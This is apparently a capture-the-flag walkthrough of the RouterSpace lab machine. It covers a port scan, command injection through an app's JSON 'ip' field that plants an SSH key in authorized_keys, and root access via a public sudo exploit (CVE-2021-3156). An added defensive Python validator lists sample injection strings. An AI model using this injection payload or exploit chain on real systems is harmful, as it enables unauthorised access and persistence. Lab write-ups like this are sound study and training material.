RouterSpace is a Linux machine rated easy. This machine has been retired and replaced by RedPanda.

Machine IP: 10.10.11.148

As always, I started by scanning the services and ports using Nmap.

Nmap scan report for 10.10.11.148
Host is up (0.15s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-RouterSpace Packet Filtering V1
80/tcp open  http
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-90404
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 76
|     ETag: W/"4c-kb4g2Jw5REaYxk9bZLPFwpFvGsE"
|     Date: Wed, 08 Jun 2022 03:27:29 GMT
|     Connection: close
|     Suspicious activity detected !!! {RequestID: c tO 1 9m 7u j M Xb 95 }
|   GetRequest:
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-91903
|     Accept-Ranges: bytes
|     Cache-Control: public, max-age=0
|     Last-Modified: Mon, 22 Nov 2021 11:33:57 GMT
|     ETag: W/"652c-17d476c9285"
|     Content-Type: text/html; charset=UTF-8
|     Content-Length: 25900
|     Date: Wed, 08 Jun 2022 03:27:28 GMT
|     Connection: close
|     <!doctype html>
|     <html class="no-js" lang="zxx">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>RouterSpace</title>
|     <meta name="description" content="">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="stylesheet" href="css/bootstrap.min.css">
|     <link rel="stylesheet" href="css/owl.carousel.min.css">
|     <link rel="stylesheet" href="css/magnific-popup.css">
|     <link rel="stylesheet" href="css/font-awesome.min.css">
|     <link rel="stylesheet" href="css/themify-icons.css">
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-56834
|     Allow: GET,HEAD,POST
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 13
|     ETag: W/"d-bMedpZYGrVt1nR4x+qdNZ2GqyRo"
|     Date: Wed, 08 Jun 2022 03:27:28 GMT
|     Connection: close
|     GET,HEAD,POST
|   RTSPRequest, X11Probe:
|     HTTP/1.1 400 Bad Request
|_    Connection: close
|_http-title: RouterSpace
|_http-trane-info: Problem with XML parsing of /evox/about

Upon accessing the website, I found a feature to download the RouterSpace.apk file.

I installed the application on Anbox and set up an HTTP proxy to intercept requests using Burp Suite. (Reference: https://www.rootcat.de/blog/anbox_setup_may21/)

Note: The Burp Suite proxy listener must be bound to the IP of the Anbox interface.

$ adb install RouterSpace.apk
$ ifconfig anbox0
[REDACTED]
inet 192.168.250.1  netmask 255.255.255.0  broadcast 0.0.0.0
[REDACTED]
$ adb shell settings put global http_proxy 192.168.250.1:8080

I opened the application using anbox.appmgr and clicked “Check Status”; Burp Suite intercepted the resulting request.

The request's Host header was routerspace.htb, so I added it to my hosts file. I sent the request to Burp Suite’s Repeater for easy re-sending. Given the POST data, I tried command injection in it and received a response.

However, attempts to execute a reverse shell did not establish a connection back to my machine. Instead, I added my SSH public key to ~/.ssh/authorized_keys for user paul. The following request was used:

POST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1
accept: application/json, text/plain, */*
user-agent: RouterSpaceAgent
Content-Type: application/json
Content-Length: 621
Host: routerspace.htb
Connection: close
Accept-Encoding: gzip, deflate

{
  "ip":"0.0.0.0;echo 'ssh-rsa [REDACTED] me@nowhere' > /home/paul/.ssh/authorized_keys"
}
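
The request above succeeds because the ip value is evidently interpreted by a shell on the server. As an added example (not part of the original write-up and not the application's code, which the page does not show), this is one way a handler could treat that field: accept only a strict IPv4 literal and build an argument vector instead of a shell string. The function names and the ping command are assumptions.

```python
import ipaddress
import json

# Constructed request bodies for the endpoint above (not captured traffic).
SAMPLE_BODIES = [
    '{"ip":"0.0.0.0"}',
    '{"ip":"0.0.0.0;echo injected"}',   # same shape as the request above
    '{"ip":"10.0.0.5\\nid"}',           # newline-separated second command
    '{"ip":["0.0.0.0"]}',               # wrong JSON type
]

def parse_device_ip(raw_body):
    """Return the canonical IPv4 address from the JSON body or raise ValueError."""
    try:
        body = json.loads(raw_body)
    except json.JSONDecodeError as exc:
        raise ValueError("body is not valid JSON") from exc
    value = body.get("ip") if isinstance(body, dict) else None
    if not isinstance(value, str):
        raise ValueError("ip must be a string")
    # IPv4Address accepts only four decimal octets, so ';', spaces, quotes and
    # newlines are rejected. ip_address() is avoided because IPv6 literals may
    # carry a free-text zone ID after '%'.
    return str(ipaddress.IPv4Address(value))

def build_check_argv(raw_body):
    """Argument vector for a hypothetical reachability check (ping is assumed)."""
    ip = parse_device_ip(raw_body)
    # Intended for subprocess.run(argv) with the default shell=False: the
    # address is a single argv entry and is never parsed by /bin/sh.
    return ["ping", "-c", "1", "--", ip]

def triage(bodies):
    """Map each body to ('accept', argv) or ('reject', reason)."""
    results = []
    for raw in bodies:
        try:
            results.append(("accept", build_check_argv(raw)))
        except ValueError as exc:
            results.append(("reject", str(exc)))
    return results

if __name__ == "__main__":
    for raw, (verdict, detail) in zip(SAMPLE_BODIES, triage(SAMPLE_BODIES)):
        print(verdict, raw, detail)
```

Rejections from this check are also worth logging: a non-address value in this field is a strong signal of an injection attempt.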

I then logged in via SSH as user paul.

$ ssh paul@routerspace.htb
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-90-generic x86_64)
[REDACTED]
paul@routerspace:~$ cat user.txt
3497cba52fcb00f[REDACTED]

After gaining access as paul, I enumerated the system and checked the sudo version.

paul@routerspace:~$ sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31

I used the exploit_nss.py script for CVE-2021-3156 (https://github.com/worawit/CVE-2021-3156/blob/main/exploit_nss.py). Since the machine could not establish external connections, I transferred the file using SCP.

$ scp exploit_nss.py paul@routerspace.htb:/tmp

After transferring the file, I ran the exploit script and obtained a root shell.

paul@routerspace:~$ cd /tmp
paul@routerspace:/tmp$ python3 exploit_nss.py
# id
uid=0(root) gid=0(root) groups=0(root),1001(paul)
# cat /root/root.txt
65cf8e2bf6627026[REDACTED]

Rooted!